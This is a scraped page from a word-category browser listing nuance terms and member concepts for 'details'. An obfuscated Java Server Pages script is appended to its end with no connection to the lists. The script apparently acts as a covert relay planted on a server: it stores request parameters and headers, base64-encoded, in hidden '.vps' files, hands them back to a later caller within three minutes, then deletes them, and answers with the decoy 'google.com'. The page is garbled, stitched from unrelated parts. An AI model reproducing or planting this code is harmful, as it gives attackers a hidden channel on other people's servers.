Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
employment_information
with head word
details
:
biographical:details,
Category Nuances matching
details
:
concrete,
special,
personal,
interesting,
out,
original,
limited,
important,
circumstantial,
microscopic,
logistical,
fine,
supporting,
complex,
graphical,
minor,
technical,
optical,
additional,
little,
pertinent,
structural,
financial,
extraneous,
up,
subtle,
sensitive,
small,
standard,
historical,
authentic,
smaller,
everyday,
factual,
interactive,
organizational,
several,
extra,
secret,
geographic,
feminine,
visual,
essential,
critical,
experimental,
musical,
architectural,
practical,
precise,
operational,
real,
legal,
related,
administrative,
level,
useful,
functional,
cultural,
vital,
basic,
aesthetic,
clear,
significant,
descriptive,
miscellaneous,
unrelated,
weather,
local,
trivial,
mundane,
general,
medical,
academic,
confidential,
odd,
complete,
relevant,
conceptual,
syntactic,
final,
amazing,
scientific,
ceremonial,
crucial,
key,
rich,
biographical,
minute,
mechanical,
domestic,
unimportant,
bibliographic,
clinical,
variable,
helpful,
bizarre,
military,
big,
Members for simple category
details
:
password,
event_schedule,
product_report,
financial_information,
fact,
portfolio,
email_details,
material,
administrative_details,
small_details,
agent_information,
format,
par_information,
contact_details,
stucco_details,
hotel_information,
bank-account_details,
reading_book,
account_information,
police_report,
schedule,
confidence,
construction_material,
formatting,
identifying_information,
maintenance_record,
book,
examination_record,
leaf_details,
individual_words,
expense_report,
account_password,
particular_material,
version_information,
pipe_details,
building-society_details,
whirlpool_details,
publication_details,
submission_details,
system_details,
database,
inventory,
account_details,
islamic_calendar,
newsletter,
lease_details,
waiting_list,
site_details,
community_information,
user_password,
bolting_schedule,
reservation_information,
agenda,
returning_key,
message_format,
public-transport_details,
flag,
texture_details,
bank_details,
record,
salary_information,
uv_index,
reinforcement_details,
pathology_report,
additional_information,
steel_reinforcement,
course_calendar,
course_schedule,
programme,
topographic_information,
syllabus,
delegate_information,
travel_details,
construction_details,
times_program,
waveform_details,
legal_documentation,
performance_schedule,
unit_list,
address_details,
flash,
structural_information,
scoop,
credit-card_details,
copyright_information,
building_timetable,
payroll_info,
index,
registry_details,
story,
refractive_index,
alternative_schedule,
time_indicator,
administrative_record,
approval_information,
passport_information,
aforementioned_key,
electronic_card,
mirror_details,
menu,
personal_info,
school_calendar,
report,
passbook_password,
door_material,
words,
resource_password,
security_information,
card_details,
evidence,
delivery_details,
transverse_reinforcement,
funding_details,
attendee_list,
local_reinforcement,
various_program,
curriculum,
credit-card_bill,
payment_information,
interior_material,
cookie_information,
hair_details,
hospital_info,
chemotherapy_details,
property_details,
gasoline_details,
video_format,
transportation_information,
merchant_account,
roll,
tricky_fact,
family_details,
place_card,
state_flag,
instructor_information,
timetable,
weather_report,
background_information,
furniture_details,
psychiatric_record,
chromatin_material,
insurance_information,
feature_list,
slide_numbering,
address_book,
reciprocity_information,
source_material,
coverage,
reading_list,
product_details,
credit-card_information,
stone_slate,
carrying_flag,
swain_bill,
transporting_witness,
bank-account_info,
employment_information,
workplace_record,
published_report,
forming_details,
interoperability_format,
flight_information,
payment_details,
client_account,
interior_details,
test_coverage,
information,
advertising_material,
multiple_format,
certification,
obtaining_fact,
new_flag,
rain-date_information,
evaluation_schedule,
health_record,
employment_details,
wall_details,
school_report,
customer_password,
written_words,
customer_record,
program,
rate_schedule,
awareness_program,
family_book,
lineup,
contrasting_material,
organizational_report,
bank-account_password,
lubrication_details,
reinforcement,
calendar,
frame_format,
employment_record,
batten_reinforcement,
granite_details,
ticket,
bill,
bmi,
battery_indicator,
country_programme,
contact_information,
christmas-tree_indicator,
escort_card,
examination_timetable,
dwelling_information,
work_details,
directory,
meeting_schedule,
personal_information,
feature_details,
memorable_information,
supply_inventory,
polymer_material,
room_key,
speaker_schedule,
romance_information,
room_information,
personal_details,
time_schedule,
list,
answer_details,
genetic_information,
map_details,
walking_schedule,
bank-card_password,
account,
key,
plate_format,
educational_information,
destination_account,
funding_information,
artist_list,
exam_schedule,
bank-account_information,
hot_key,
medium_format,
page_numbering,
management_account,
family_information,
paying_bill,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>